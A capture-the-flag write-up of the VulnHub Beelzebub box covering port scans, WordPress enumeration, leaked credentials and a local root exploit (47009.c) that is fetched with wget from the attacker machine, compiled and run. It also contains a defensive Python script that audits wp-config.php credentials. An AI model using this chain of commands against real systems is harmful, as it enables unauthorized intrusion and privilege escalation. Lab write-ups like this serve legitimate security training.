Port scanning

┌──(mikannse㉿kali)-[~/vulnhub/beelzhub]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:21 HKT
Nmap scan report for 192.168.56.105
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:8C:C2:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
┌──(mikannse㉿kali)-[~/vulnhub/beelzhub]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:21 HKT
Nmap scan report for 192.168.56.105
Host is up (0.00035s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
| 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:8C:C2:E1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 5.0 - 5.4 (97%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds

Getshell

Visited port 80: an Apache default page. Directory scanning turned up a phpmyadmin; tried a few weak passwords against it with no success.

Found a comment line in index.php:

Tried md5 hashing it and got:

┌──(mikannse㉿kali)-[~/vulnhub/beelzhub]
└─$ echo -n "beelzebub" |md5sum
d18e1e22becbd915b45e0e655429d487 -

Appending that to the directory path, dirsearch was able to find a WordPress site, but at first gobuster and feroxbuster couldn't reach it at all, not sure why.

wpscan enumerated a username, krampus, and the page wp-content/uploads/Talk To VALAK/index.php lets you interact with it; the response sets a cookie Password=M4k3Ad3a1

But the environment kept having problems here: running a scanner for even a short while crashed the server, so I jumped straight to user; SSH login works.

Found in wp-config.php:

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'P0k3M0n' );
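
Since a wp-config.php handing WordPress the MySQL root account is exactly the kind of misconfiguration a defender wants to catch, here is a small added audit script (my own example, not part of the original writeup or of WordPress). It parses the define() lines shown above, which are embedded as a constructed sample, and reports the findings; the 12-character length threshold is an assumption of the example.

```python
import re
from typing import Dict, List

# Constructed sample: the two define() lines quoted from the box's wp-config.php
SAMPLE_WP_CONFIG = """\
/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'P0k3M0n' );
"""

# Matches define( 'KEY', 'value' );  (single or double quotes, loose spacing)
DEFINE_RE = re.compile(
    r"""define\(\s*['"]([A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)\s*;"""
)

# Assumed policy threshold for this example
MIN_PASSWORD_LEN = 12


def parse_defines(text: str) -> Dict[str, str]:
    """Collect define('KEY', 'value') pairs from a wp-config.php fragment."""
    return {key: value for key, value in DEFINE_RE.findall(text)}


def audit_wp_config(text: str) -> List[str]:
    """Return human-readable findings about the database credentials."""
    cfg = parse_defines(text)
    user = cfg.get("DB_USER", "")
    password = cfg.get("DB_PASSWORD", "")
    findings: List[str] = []
    if user == "root":
        # WordPress only needs rights on its own database, never the server-wide root account
        findings.append("DB_USER is 'root': use a dedicated MySQL account limited to the WordPress database")
    if len(password) < MIN_PASSWORD_LEN:
        findings.append(f"DB_PASSWORD is only {len(password)} characters: use a long random secret")
    if password and password.lower() == user.lower():
        findings.append("DB_PASSWORD equals DB_USER")
    return findings


if __name__ == "__main__":
    for finding in audit_wp_config(SAMPLE_WP_CONFIG):
        print("[!]", finding)
```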

But enumerating the database turned up nothing; then I noticed the user's command history in the home directory contains:

mv 47009 ./exploit.c
gcc exploit.c -o exploit

Privilege escalation

Upload this exploit to the target, compile it, and run it in one go.

krampus@beelzebub:/tmp$ wget http://192.168.56.102/47009.c
--2024-10-13 18:43:07-- http://192.168.56.102/47009.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 588 [text/x-csrc]
Saving to: ‘47009.c’

47009.c 100%[==================================>] 588 --.-KB/s in 0s

2024-10-13 18:43:07 (13.7 MB/s) - ‘47009.c’ saved [588/588]

krampus@beelzebub:/tmp$ gcc 47009.c -o pwn
krampus@beelzebub:/tmp$ chmod +x pwn
krampus@beelzebub:/tmp$ ./pwn
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)
opening root shell
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)

Rambling

The room's quality isn't great; the network kept having issues while I played it, and it likes to hide things.